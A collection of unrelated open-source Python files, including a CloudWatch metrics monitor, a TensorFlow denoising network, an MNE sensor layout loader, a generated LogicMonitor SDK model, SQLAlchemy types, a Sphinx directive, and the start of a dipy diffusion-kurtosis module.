raise TypeError("expecting cloudwatch service object")
@resource
class NamespaceResource:
"""Create Namespace resource."""
def __init__(self, name: str):
self.name = name
@operation(policies=policies)
async def post(self, metrics: Iterable[Metric]):
metrics = deque(metrics)
data = []
while metrics:
metric = metrics.popleft()
datum = {
"MetricName": metric.name,
"Dimensions": [
{"Name": k, "Value": v} for k, v in metric.dimensions.items()
],
"Timestamp": metric.timestamp,
}
if metric.unit:
datum["Unit"] = metric.unit
if metric.resolution:
datum["Resolution"] = metric.resolution
if isinstance(metric.value, (int, float)):
datum["Value"] = float(metric.value)
elif isinstance(metric.value, dict):
datum["Values"] = [float(v) for v in metric.value.keys()]
datum["Counts"] = [float(v) for v in metric.value.values()]
elif isinstance(metric.value, Statistics):
datum["StatisticValues"] = {
"SampleCount": float(metric.value.count),
"Sum": float(metric.value.sum),
"Minimum": float(metric.value.minimum),
"Maximum": float(metric.value.maximum),
}
data.append(datum)
if len(data) == 20 or not metrics:
client = await service.client()
await client.put_metric_data(Namespace=self.name, MetricData=data)
@resource
class CloudWatchResource:
"""Create CloudWatch resource."""
def namespace(self, name: str) -> NamespaceResource:
return NamespaceResource(name)
return CloudWatchResource()
class CloudWatchMonitor:
"""
A monitor that stores all recorded measurements in CloudWatch.
"""
# future: collect metrics, send in batches
def __init__(self, service: Service, namespace: str):
self.resource = cloudwatch_resource(service=service).namespace(namespace)
async def record(self, measurement: Measurement):
"""Record a measurement."""
if measurement.type == "counter":
m = Counter(timestamp=measurement.timestamp)
m.record(measurement.value)
metric = Metric(
name=measurement.tags["name"],
dimensions={"Name": measurement.type, "Value": str(m.value)},
timestamp=measurement.timestamp,
value=float(m.value),
unit="Count",
)
elif measurement.type == "gauge":
m = Gauge(timestamp=measurement.timestamp)
m.record(measurement.value)
metric = Metric(
name=measurement.tags["name"],
dimensions={"Name": measurement.type, "Value": str(measurement.value)},
timestamp=measurement.timestamp,
value=Statistics(
count=float(m.count),
sum=float(m.sum),
minimum=float(m.min),
maximum=float(m.max),
),
)
elif measurement.type == "absolute":
m = Absolute(timestamp=measurement.timestamp)
m.record(measurement.value)
metric = Metric(
name=measurement.tags["name"],
dimensions={"Name": measurement.type, "Value": str(m.value)},
timestamp=measurement.timestamp,
value=float(m.value),
)
await self.resource.post(metrics=[metric])
| 2.171875 | 2 |
dnn.py | OSU-slatelab/mask-vs-map | 1 | 12786462 | <gh_stars>1-10
import tensorflow as tf
import numpy as np
import tfsignal
class DNN():
"""
ResNet-style architecture for speech denoising.
"""
def __init__(self,
inputs,
output_dim,
layers = 2,
units = 2048,
context = 5,
activation = tf.nn.relu,
dropout = 0.3,
output_type = ['fidelity'],
):
"""
Build the graph.
Parameters
----------
inputs : Placeholder
Spectral inputs to this model, of the shape (batchsize, frames, frequencies)
output_shape : int
Size of the output
filters : list of ints
Size of each block
fc_layers : int
Number of fully-connected hidden layers
fc_nodes : int
Number of units to put in each fc hidden layer
activation : function
Function to apply before conv layers as an activation
dropout : float
Fraction of filters and nodes to drop
Returns
-------
Tensor
Outputs of the dropnet model
"""
# Store hyperparameters
self.inputs = inputs
self.activation = activation
self.dropout = dropout
self.training = tf.placeholder(tf.bool)
# Pad inputs for contextual frames
padding = [[0, 0], [0, 0], [context, context], [0, 0]]
padded_inputs = tf.pad(inputs, padding, "REFLECT")
#self.final_input = padded_inputs
# We want to apply the DNN to overlapping regions of the input... so use CNN to implement the DNN!
# Use filter size of frames x frequency x units
fc = tf.layers.conv2d(
inputs = padded_inputs,
filters = units,
kernel_size = [2*context+1, padded_inputs.get_shape()[-1]],
activation = activation,
data_format = 'channels_first',
name = 'fc0',
)
# Put channels last for DNN
fc = tf.transpose(fc, [0, 2, 3, 1])
fc = tf.layers.dropout(fc, rate=dropout, training=self.training)
# Actual fully connected layers
for i in range(1, layers):
fc = tf.layers.dense(
inputs = fc,
units = units,
activation = activation,
name = f"fc{i}",
)
fc = tf.layers.dropout(
inputs = fc,
rate = dropout,
training = self.training,
)
self.outputs = tf.layers.dense(fc, output_dim)
self.outputs = tf.reshape(self.outputs, [1, 1, -1, output_dim])
# Compute outputs
input_min = tf.reduce_min(self.inputs)
self.scale_vars = []
if 'masking' in output_type:
self.masking = tf.identity(self.outputs)
self.outputs = tf.multiply(tf.sigmoid(self.outputs), self.inputs - input_min) + input_min
#if 'fidelity' in output_type:
# self.outputs = self.scale(self.outputs, name = 'mask', scale_init = 0.5)
# self.fidelity = self.fully_connected(flat, out_shape, name="fc_out")
# self.outputs += self.scale(self.fidelity, name = 'map', scale_init = 0.5)
#else:
# self.outputs = self.scale(self.outputs, name = 'mask')
elif 'fidelity' in output_type:
self.fidelity = tf.identity(self.outputs)
#if 'map-as-mask-mimic' in output_type:
# masked_by_map = tf.multiply(self.maskify(self.outputs), self.inputs - input_min) + input_min
# self.outputs = self.scale(masked_by_map, 'mask')
| 3.171875 | 3 |
mne/layouts/layout.py | mluessi/mne-python | 1 | 12786463 | <filename>mne/layouts/layout.py
import os.path as op
import numpy as np
class Layout(object):
"""Sensor layouts"""
def __init__(self, kind='Vectorview-all', path=None):
"""
Parameters
----------
kind : 'Vectorview-all' | 'CTF-275' | 'Vectorview-grad' | 'Vectorview-mag'
Type of layout (can also be custom for EEG)
path : string
Path to folder where to find the layout file.
"""
if path is None:
path = op.dirname(__file__)
lout_fname = op.join(path, kind + '.lout')
f = open(lout_fname)
f.readline() # skip first line
names = []
pos = []
for line in f:
splits = line.split()
if len(splits) == 7:
_, x, y, dx, dy, chkind, nb = splits
name = chkind + ' ' + nb
else:
_, x, y, dx, dy, name = splits
pos.append(np.array([x, y, dx, dy], dtype=np.float))
names.append(name)
pos = np.array(pos)
pos[:, 0] -= np.min(pos[:, 0])
pos[:, 1] -= np.min(pos[:, 1])
scaling = max(np.max(pos[:, 0]), np.max(pos[:, 1])) + pos[0, 2]
pos /= scaling
pos[:, :2] += 0.03
pos[:, :2] *= 0.97 / 1.03
pos[:, 2:] *= 0.94
f.close()
self.kind = kind
self.pos = pos
self.names = names
# if __name__ == '__main__':
#
# layout = Layout()
#
# import pylab as pl
# pl.rcParams['axes.edgecolor'] = 'w'
# pl.close('all')
# pl.figure(facecolor='k', )
#
# for i in range(5):
# # for i in range(len(pos)):
# ax = pl.axes(layout.pos[i], axisbg='k')
# ax.plot(np.random.randn(3), 'w')
# pl.xticks([], ())
# pl.yticks([], ())
# pl.gca().grid(color='w')
#
# pl.show()
| 2.609375 | 3 |
logicmonitor_sdk/models/device_data_source.py | JeremyTangCD/lm-sdk-python | 0 | 12786464 | # coding: utf-8
"""
LogicMonitor REST API
LogicMonitor is a SaaS-based performance monitoring platform that provides full visibility into complex, hybrid infrastructures, offering granular performance monitoring and actionable data and insights. logicmonitor_sdk enables you to manage your LogicMonitor account programmatically. # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from logicmonitor_sdk.models.device_datasource_graph import DeviceDatasourceGraph # noqa: F401,E501
from logicmonitor_sdk.models.tree_node import TreeNode # noqa: F401,E501
class DeviceDataSource(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'alert_status': 'str',
'auto_discovery': 'bool',
'data_source_display_name': 'str',
'device_id': 'int',
'device_name': 'str',
'created_on': 'int',
'collect_method': 'str',
'data_source_id': 'int',
'graphs': 'list[DeviceDatasourceGraph]',
'sdt_at': 'str',
'next_auto_discovery_on': 'int',
'id': 'int',
'alert_status_priority': 'int',
'alert_disable_status': 'str',
'data_source_description': 'str',
'overview_graphs': 'list[DeviceDatasourceGraph]',
'stop_monitoring': 'bool',
'assigned_on': 'int',
'is_multiple': 'bool',
'instance_number': 'int',
'updated_on': 'int',
'sdt_status': 'str',
'data_source_name': 'str',
'device_display_name': 'str',
'monitoring_instance_number': 'int',
'groups_disabled_this_source': 'list[TreeNode]',
'group_name': 'str',
'instance_auto_group_enabled': 'bool',
'alerting_disabled_on': 'TreeNode',
'data_source_type': 'str',
'status': 'int'
}
attribute_map = {
'alert_status': 'alertStatus',
'auto_discovery': 'autoDiscovery',
'data_source_display_name': 'dataSourceDisplayName',
'device_id': 'deviceId',
'device_name': 'deviceName',
'created_on': 'createdOn',
'collect_method': 'collectMethod',
'data_source_id': 'dataSourceId',
'graphs': 'graphs',
'sdt_at': 'sdtAt',
'next_auto_discovery_on': 'nextAutoDiscoveryOn',
'id': 'id',
'alert_status_priority': 'alertStatusPriority',
'alert_disable_status': 'alertDisableStatus',
'data_source_description': 'dataSourceDescription',
'overview_graphs': 'overviewGraphs',
'stop_monitoring': 'stopMonitoring',
'assigned_on': 'assignedOn',
'is_multiple': 'isMultiple',
'instance_number': 'instanceNumber',
'updated_on': 'updatedOn',
'sdt_status': 'sdtStatus',
'data_source_name': 'dataSourceName',
'device_display_name': 'deviceDisplayName',
'monitoring_instance_number': 'monitoringInstanceNumber',
'groups_disabled_this_source': 'groupsDisabledThisSource',
'group_name': 'groupName',
'instance_auto_group_enabled': 'instanceAutoGroupEnabled',
'alerting_disabled_on': 'alertingDisabledOn',
'data_source_type': 'dataSourceType',
'status': 'status'
}
def __init__(self, alert_status=None, auto_discovery=None, data_source_display_name=None, device_id=None, device_name=None, created_on=None, collect_method=None, data_source_id=None, graphs=None, sdt_at=None, next_auto_discovery_on=None, id=None, alert_status_priority=None, alert_disable_status=None, data_source_description=None, overview_graphs=None, stop_monitoring=None, assigned_on=None, is_multiple=None, instance_number=None, updated_on=None, sdt_status=None, data_source_name=None, device_display_name=None, monitoring_instance_number=None, groups_disabled_this_source=None, group_name=None, instance_auto_group_enabled=None, alerting_disabled_on=None, data_source_type=None, status=None): # noqa: E501
"""DeviceDataSource - a model defined in Swagger""" # noqa: E501
self._alert_status = None
self._auto_discovery = None
self._data_source_display_name = None
self._device_id = None
self._device_name = None
self._created_on = None
self._collect_method = None
self._data_source_id = None
self._graphs = None
self._sdt_at = None
self._next_auto_discovery_on = None
self._id = None
self._alert_status_priority = None
self._alert_disable_status = None
self._data_source_description = None
self._overview_graphs = None
self._stop_monitoring = None
self._assigned_on = None
self._is_multiple = None
self._instance_number = None
self._updated_on = None
self._sdt_status = None
self._data_source_name = None
self._device_display_name = None
self._monitoring_instance_number = None
self._groups_disabled_this_source = None
self._group_name = None
self._instance_auto_group_enabled = None
self._alerting_disabled_on = None
self._data_source_type = None
self._status = None
self.discriminator = None
if alert_status is not None:
self.alert_status = alert_status
if auto_discovery is not None:
self.auto_discovery = auto_discovery
if data_source_display_name is not None:
self.data_source_display_name = data_source_display_name
if device_id is not None:
self.device_id = device_id
if device_name is not None:
self.device_name = device_name
if created_on is not None:
self.created_on = created_on
if collect_method is not None:
self.collect_method = collect_method
if data_source_id is not None:
self.data_source_id = data_source_id
if graphs is not None:
self.graphs = graphs
if sdt_at is not None:
self.sdt_at = sdt_at
if next_auto_discovery_on is not None:
self.next_auto_discovery_on = next_auto_discovery_on
if id is not None:
self.id = id
if alert_status_priority is not None:
self.alert_status_priority = alert_status_priority
if alert_disable_status is not None:
self.alert_disable_status = alert_disable_status
if data_source_description is not None:
self.data_source_description = data_source_description
if overview_graphs is not None:
self.overview_graphs = overview_graphs
if stop_monitoring is not None:
self.stop_monitoring = stop_monitoring
if assigned_on is not None:
self.assigned_on = assigned_on
if is_multiple is not None:
self.is_multiple = is_multiple
if instance_number is not None:
self.instance_number = instance_number
if updated_on is not None:
self.updated_on = updated_on
if sdt_status is not None:
self.sdt_status = sdt_status
if data_source_name is not None:
self.data_source_name = data_source_name
if device_display_name is not None:
self.device_display_name = device_display_name
if monitoring_instance_number is not None:
self.monitoring_instance_number = monitoring_instance_number
if groups_disabled_this_source is not None:
self.groups_disabled_this_source = groups_disabled_this_source
if group_name is not None:
self.group_name = group_name
if instance_auto_group_enabled is not None:
self.instance_auto_group_enabled = instance_auto_group_enabled
if alerting_disabled_on is not None:
self.alerting_disabled_on = alerting_disabled_on
if data_source_type is not None:
self.data_source_type = data_source_type
if status is not None:
self.status = status
@property
def alert_status(self):
"""Gets the alert_status of this DeviceDataSource. # noqa: E501
:return: The alert_status of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._alert_status
@alert_status.setter
def alert_status(self, alert_status):
"""Sets the alert_status of this DeviceDataSource.
:param alert_status: The alert_status of this DeviceDataSource. # noqa: E501
:type: str
"""
self._alert_status = alert_status
@property
def auto_discovery(self):
"""Gets the auto_discovery of this DeviceDataSource. # noqa: E501
:return: The auto_discovery of this DeviceDataSource. # noqa: E501
:rtype: bool
"""
return self._auto_discovery
@auto_discovery.setter
def auto_discovery(self, auto_discovery):
"""Sets the auto_discovery of this DeviceDataSource.
:param auto_discovery: The auto_discovery of this DeviceDataSource. # noqa: E501
:type: bool
"""
self._auto_discovery = auto_discovery
@property
def data_source_display_name(self):
"""Gets the data_source_display_name of this DeviceDataSource. # noqa: E501
:return: The data_source_display_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._data_source_display_name
@data_source_display_name.setter
def data_source_display_name(self, data_source_display_name):
"""Sets the data_source_display_name of this DeviceDataSource.
:param data_source_display_name: The data_source_display_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._data_source_display_name = data_source_display_name
@property
def device_id(self):
"""Gets the device_id of this DeviceDataSource. # noqa: E501
:return: The device_id of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._device_id
@device_id.setter
def device_id(self, device_id):
"""Sets the device_id of this DeviceDataSource.
:param device_id: The device_id of this DeviceDataSource. # noqa: E501
:type: int
"""
self._device_id = device_id
@property
def device_name(self):
"""Gets the device_name of this DeviceDataSource. # noqa: E501
:return: The device_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._device_name
@device_name.setter
def device_name(self, device_name):
"""Sets the device_name of this DeviceDataSource.
:param device_name: The device_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._device_name = device_name
@property
def created_on(self):
"""Gets the created_on of this DeviceDataSource. # noqa: E501
:return: The created_on of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._created_on
@created_on.setter
def created_on(self, created_on):
"""Sets the created_on of this DeviceDataSource.
:param created_on: The created_on of this DeviceDataSource. # noqa: E501
:type: int
"""
self._created_on = created_on
@property
def collect_method(self):
"""Gets the collect_method of this DeviceDataSource. # noqa: E501
:return: The collect_method of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._collect_method
@collect_method.setter
def collect_method(self, collect_method):
"""Sets the collect_method of this DeviceDataSource.
:param collect_method: The collect_method of this DeviceDataSource. # noqa: E501
:type: str
"""
self._collect_method = collect_method
@property
def data_source_id(self):
"""Gets the data_source_id of this DeviceDataSource. # noqa: E501
:return: The data_source_id of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._data_source_id
@data_source_id.setter
def data_source_id(self, data_source_id):
"""Sets the data_source_id of this DeviceDataSource.
:param data_source_id: The data_source_id of this DeviceDataSource. # noqa: E501
:type: int
"""
self._data_source_id = data_source_id
@property
def graphs(self):
"""Gets the graphs of this DeviceDataSource. # noqa: E501
:return: The graphs of this DeviceDataSource. # noqa: E501
:rtype: list[DeviceDatasourceGraph]
"""
return self._graphs
@graphs.setter
def graphs(self, graphs):
"""Sets the graphs of this DeviceDataSource.
:param graphs: The graphs of this DeviceDataSource. # noqa: E501
:type: list[DeviceDatasourceGraph]
"""
self._graphs = graphs
@property
def sdt_at(self):
"""Gets the sdt_at of this DeviceDataSource. # noqa: E501
:return: The sdt_at of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._sdt_at
@sdt_at.setter
def sdt_at(self, sdt_at):
"""Sets the sdt_at of this DeviceDataSource.
:param sdt_at: The sdt_at of this DeviceDataSource. # noqa: E501
:type: str
"""
self._sdt_at = sdt_at
@property
def next_auto_discovery_on(self):
"""Gets the next_auto_discovery_on of this DeviceDataSource. # noqa: E501
:return: The next_auto_discovery_on of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._next_auto_discovery_on
@next_auto_discovery_on.setter
def next_auto_discovery_on(self, next_auto_discovery_on):
"""Sets the next_auto_discovery_on of this DeviceDataSource.
:param next_auto_discovery_on: The next_auto_discovery_on of this DeviceDataSource. # noqa: E501
:type: int
"""
self._next_auto_discovery_on = next_auto_discovery_on
@property
def id(self):
"""Gets the id of this DeviceDataSource. # noqa: E501
:return: The id of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this DeviceDataSource.
:param id: The id of this DeviceDataSource. # noqa: E501
:type: int
"""
self._id = id
@property
def alert_status_priority(self):
"""Gets the alert_status_priority of this DeviceDataSource. # noqa: E501
:return: The alert_status_priority of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._alert_status_priority
@alert_status_priority.setter
def alert_status_priority(self, alert_status_priority):
"""Sets the alert_status_priority of this DeviceDataSource.
:param alert_status_priority: The alert_status_priority of this DeviceDataSource. # noqa: E501
:type: int
"""
self._alert_status_priority = alert_status_priority
@property
def alert_disable_status(self):
"""Gets the alert_disable_status of this DeviceDataSource. # noqa: E501
:return: The alert_disable_status of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._alert_disable_status
@alert_disable_status.setter
def alert_disable_status(self, alert_disable_status):
"""Sets the alert_disable_status of this DeviceDataSource.
:param alert_disable_status: The alert_disable_status of this DeviceDataSource. # noqa: E501
:type: str
"""
self._alert_disable_status = alert_disable_status
@property
def data_source_description(self):
"""Gets the data_source_description of this DeviceDataSource. # noqa: E501
:return: The data_source_description of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._data_source_description
@data_source_description.setter
def data_source_description(self, data_source_description):
"""Sets the data_source_description of this DeviceDataSource.
:param data_source_description: The data_source_description of this DeviceDataSource. # noqa: E501
:type: str
"""
self._data_source_description = data_source_description
@property
def overview_graphs(self):
"""Gets the overview_graphs of this DeviceDataSource. # noqa: E501
:return: The overview_graphs of this DeviceDataSource. # noqa: E501
:rtype: list[DeviceDatasourceGraph]
"""
return self._overview_graphs
@overview_graphs.setter
def overview_graphs(self, overview_graphs):
"""Sets the overview_graphs of this DeviceDataSource.
:param overview_graphs: The overview_graphs of this DeviceDataSource. # noqa: E501
:type: list[DeviceDatasourceGraph]
"""
self._overview_graphs = overview_graphs
@property
def stop_monitoring(self):
"""Gets the stop_monitoring of this DeviceDataSource. # noqa: E501
:return: The stop_monitoring of this DeviceDataSource. # noqa: E501
:rtype: bool
"""
return self._stop_monitoring
@stop_monitoring.setter
def stop_monitoring(self, stop_monitoring):
"""Sets the stop_monitoring of this DeviceDataSource.
:param stop_monitoring: The stop_monitoring of this DeviceDataSource. # noqa: E501
:type: bool
"""
self._stop_monitoring = stop_monitoring
@property
def assigned_on(self):
"""Gets the assigned_on of this DeviceDataSource. # noqa: E501
:return: The assigned_on of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._assigned_on
@assigned_on.setter
def assigned_on(self, assigned_on):
"""Sets the assigned_on of this DeviceDataSource.
:param assigned_on: The assigned_on of this DeviceDataSource. # noqa: E501
:type: int
"""
self._assigned_on = assigned_on
@property
def is_multiple(self):
"""Gets the is_multiple of this DeviceDataSource. # noqa: E501
:return: The is_multiple of this DeviceDataSource. # noqa: E501
:rtype: bool
"""
return self._is_multiple
@is_multiple.setter
def is_multiple(self, is_multiple):
"""Sets the is_multiple of this DeviceDataSource.
:param is_multiple: The is_multiple of this DeviceDataSource. # noqa: E501
:type: bool
"""
self._is_multiple = is_multiple
@property
def instance_number(self):
"""Gets the instance_number of this DeviceDataSource. # noqa: E501
:return: The instance_number of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._instance_number
@instance_number.setter
def instance_number(self, instance_number):
"""Sets the instance_number of this DeviceDataSource.
:param instance_number: The instance_number of this DeviceDataSource. # noqa: E501
:type: int
"""
self._instance_number = instance_number
@property
def updated_on(self):
"""Gets the updated_on of this DeviceDataSource. # noqa: E501
:return: The updated_on of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._updated_on
@updated_on.setter
def updated_on(self, updated_on):
"""Sets the updated_on of this DeviceDataSource.
:param updated_on: The updated_on of this DeviceDataSource. # noqa: E501
:type: int
"""
self._updated_on = updated_on
@property
def sdt_status(self):
"""Gets the sdt_status of this DeviceDataSource. # noqa: E501
:return: The sdt_status of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._sdt_status
@sdt_status.setter
def sdt_status(self, sdt_status):
"""Sets the sdt_status of this DeviceDataSource.
:param sdt_status: The sdt_status of this DeviceDataSource. # noqa: E501
:type: str
"""
self._sdt_status = sdt_status
@property
def data_source_name(self):
"""Gets the data_source_name of this DeviceDataSource. # noqa: E501
:return: The data_source_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._data_source_name
@data_source_name.setter
def data_source_name(self, data_source_name):
"""Sets the data_source_name of this DeviceDataSource.
:param data_source_name: The data_source_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._data_source_name = data_source_name
@property
def device_display_name(self):
"""Gets the device_display_name of this DeviceDataSource. # noqa: E501
:return: The device_display_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._device_display_name
@device_display_name.setter
def device_display_name(self, device_display_name):
"""Sets the device_display_name of this DeviceDataSource.
:param device_display_name: The device_display_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._device_display_name = device_display_name
@property
def monitoring_instance_number(self):
"""Gets the monitoring_instance_number of this DeviceDataSource. # noqa: E501
:return: The monitoring_instance_number of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._monitoring_instance_number
@monitoring_instance_number.setter
def monitoring_instance_number(self, monitoring_instance_number):
"""Sets the monitoring_instance_number of this DeviceDataSource.
:param monitoring_instance_number: The monitoring_instance_number of this DeviceDataSource. # noqa: E501
:type: int
"""
self._monitoring_instance_number = monitoring_instance_number
@property
def groups_disabled_this_source(self):
"""Gets the groups_disabled_this_source of this DeviceDataSource. # noqa: E501
:return: The groups_disabled_this_source of this DeviceDataSource. # noqa: E501
:rtype: list[TreeNode]
"""
return self._groups_disabled_this_source
@groups_disabled_this_source.setter
def groups_disabled_this_source(self, groups_disabled_this_source):
"""Sets the groups_disabled_this_source of this DeviceDataSource.
:param groups_disabled_this_source: The groups_disabled_this_source of this DeviceDataSource. # noqa: E501
:type: list[TreeNode]
"""
self._groups_disabled_this_source = groups_disabled_this_source
@property
def group_name(self):
"""Gets the group_name of this DeviceDataSource. # noqa: E501
:return: The group_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._group_name
@group_name.setter
def group_name(self, group_name):
"""Sets the group_name of this DeviceDataSource.
:param group_name: The group_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._group_name = group_name
@property
def instance_auto_group_enabled(self):
"""Gets the instance_auto_group_enabled of this DeviceDataSource. # noqa: E501
:return: The instance_auto_group_enabled of this DeviceDataSource. # noqa: E501
:rtype: bool
"""
return self._instance_auto_group_enabled
@instance_auto_group_enabled.setter
def instance_auto_group_enabled(self, instance_auto_group_enabled):
"""Sets the instance_auto_group_enabled of this DeviceDataSource.
:param instance_auto_group_enabled: The instance_auto_group_enabled of this DeviceDataSource. # noqa: E501
:type: bool
"""
self._instance_auto_group_enabled = instance_auto_group_enabled
@property
def alerting_disabled_on(self):
"""Gets the alerting_disabled_on of this DeviceDataSource. # noqa: E501
:return: The alerting_disabled_on of this DeviceDataSource. # noqa: E501
:rtype: TreeNode
"""
return self._alerting_disabled_on
@alerting_disabled_on.setter
def alerting_disabled_on(self, alerting_disabled_on):
"""Sets the alerting_disabled_on of this DeviceDataSource.
:param alerting_disabled_on: The alerting_disabled_on of this DeviceDataSource. # noqa: E501
:type: TreeNode
"""
self._alerting_disabled_on = alerting_disabled_on
@property
def data_source_type(self):
"""Gets the data_source_type of this DeviceDataSource. # noqa: E501
:return: The data_source_type of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._data_source_type
@data_source_type.setter
def data_source_type(self, data_source_type):
"""Sets the data_source_type of this DeviceDataSource.
:param data_source_type: The data_source_type of this DeviceDataSource. # noqa: E501
:type: str
"""
self._data_source_type = data_source_type
@property
def status(self):
"""Gets the status of this DeviceDataSource. # noqa: E501
:return: The status of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this DeviceDataSource.
:param status: The status of this DeviceDataSource. # noqa: E501
:type: int
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(DeviceDataSource, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeviceDataSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 2.03125 | 2 |
ccvpn/models/types.py | CCrypto/ccvpn | 81 | 12786465 | <filename>ccvpn/models/types.py<gh_stars>10-100
from sqlalchemy import TypeDecorator, UnicodeText, String
from sqlalchemy.ext.mutable import Mutable
from sqlalchemy.dialects import postgresql # INET
import json
class JSONEncodedDict(TypeDecorator):
impl = UnicodeText
def process_bind_param(self, value, dialect):
if value:
return json.dumps(value)
else:
return None
def process_result_value(self, value, dialect):
if value is not None:
return json.loads(value)
else:
return dict()
class MutableDict(Mutable, dict):
@classmethod
def coerce(cls, key, value):
"Convert plain dictionaries to MutableDict."
if not isinstance(value, MutableDict):
if isinstance(value, dict):
return MutableDict(value)
# this call will raise ValueError
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
"Detect dictionary set events and emit change events."
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
"Detect dictionary del events and emit change events."
dict.__delitem__(self, key)
self.changed()
class INETWrapper(TypeDecorator):
impl = String
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgresql.INET())
else:
return dialect.type_descriptor(String())
| 2.21875 | 2 |
cyra/cyradoc.py | Theta-Dev/Cyra | 0 | 12786466 | <reponame>Theta-Dev/Cyra
from typing import List
import importlib
from sphinx.application import Sphinx
from sphinx.util import logging
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from docutils.statemachine import StringList
import cyra
logger = logging.getLogger(__name__)
class CyradocDirective(Directive):
required_arguments = 1
option_spec = {
'no-docstrings': directives.flag,
}
@staticmethod
def _get_class(cfg_path, location):
split_path = cfg_path.rsplit('.', 1)
if len(split_path) != 2:
logger.error('Cyradoc path must have the format <Module>.<Class>', location=location)
return None
modname, clsname = split_path
try:
mod = importlib.import_module(modname)
except ImportError:
logger.error('Cyradoc could not find module %s' % modname, location=location)
return None
try:
config_cls = getattr(mod, clsname)
except AttributeError:
logger.error('Cyradoc could not find class %s in module %s'
% (clsname, modname), location=location)
return None
if not issubclass(config_cls, cyra.Config):
logger.error('Class %s is not a Cyradoc class' % cfg_path, location=location)
return None
return config_cls
@staticmethod
def _new_toml_block(toml):
literal = nodes.literal_block(toml, toml)
literal['language'] = 'toml'
return literal
def run(self): # type: () -> List[nodes.Node]
location = self.state_machine.get_source_and_line(self.lineno)
cfg_path = self.arguments[0]
config_cls = self._get_class(cfg_path, location)
if config_cls is None:
return []
config = config_cls('')
result = []
if 'no-docstrings' in self.options:
toml = config.export_toml()
result.append(self._new_toml_block(toml))
else:
for docstring, toml in config.get_docblocks():
if docstring:
rst = StringList(docstring.split('\n'))
# Create a node.
node = nodes.option_string()
node.document = self.state.document
# Parse the rst.
self.state.nested_parse(rst, 0, node)
result.append(node)
if toml:
result.append(self._new_toml_block(toml))
return result
def setup(app): # type: (Sphinx) -> None
app.add_directive('cyradoc', CyradocDirective)
| 1.96875 | 2 |
dipy/reconst/dki_micro.py | nasimanousheh/dipy | 8 | 12786467 | <reponame>nasimanousheh/dipy<filename>dipy/reconst/dki_micro.py
#!/usr/bin/python
""" Classes and functions for fitting the DKI-based microstructural model """
from __future__ import division, print_function, absolute_import
import numpy as np
from dipy.reconst.dti import (lower_triangular, from_lower_triangular,
decompose_tensor, trace, mean_diffusivity,
radial_diffusivity, axial_diffusivity,
MIN_POSITIVE_SIGNAL)
from dipy.reconst.dki import (split_dki_param, _positive_evals,
directional_kurtosis,
directional_diffusion, kurtosis_maximum,
DiffusionKurtosisModel, DiffusionKurtosisFit)
from dipy.reconst.dti import design_matrix as dti_design_matrix
from dipy.core.ndindex import ndindex
from dipy.reconst.vec_val_sum import vec_val_vect
from dipy.data import get_sphere
import dipy.core.sphere as dps
def axonal_water_fraction(dki_params, sphere='repulsion100', gtol=1e-2,
mask=None):
""" Computes the axonal water fraction from DKI [1]_.
Parameters
----------
dki_params : ndarray (x, y, z, 27) or (n, 27)
All parameters estimated from the diffusion kurtosis model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the first,
second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
sphere : Sphere class instance, optional
The sphere providing sample directions for the initial search of the
maximal value of kurtosis.
gtol : float, optional
This input is to refine kurtosis maxima under the precision of the
directions sampled on the sphere class instance. The gradient of the
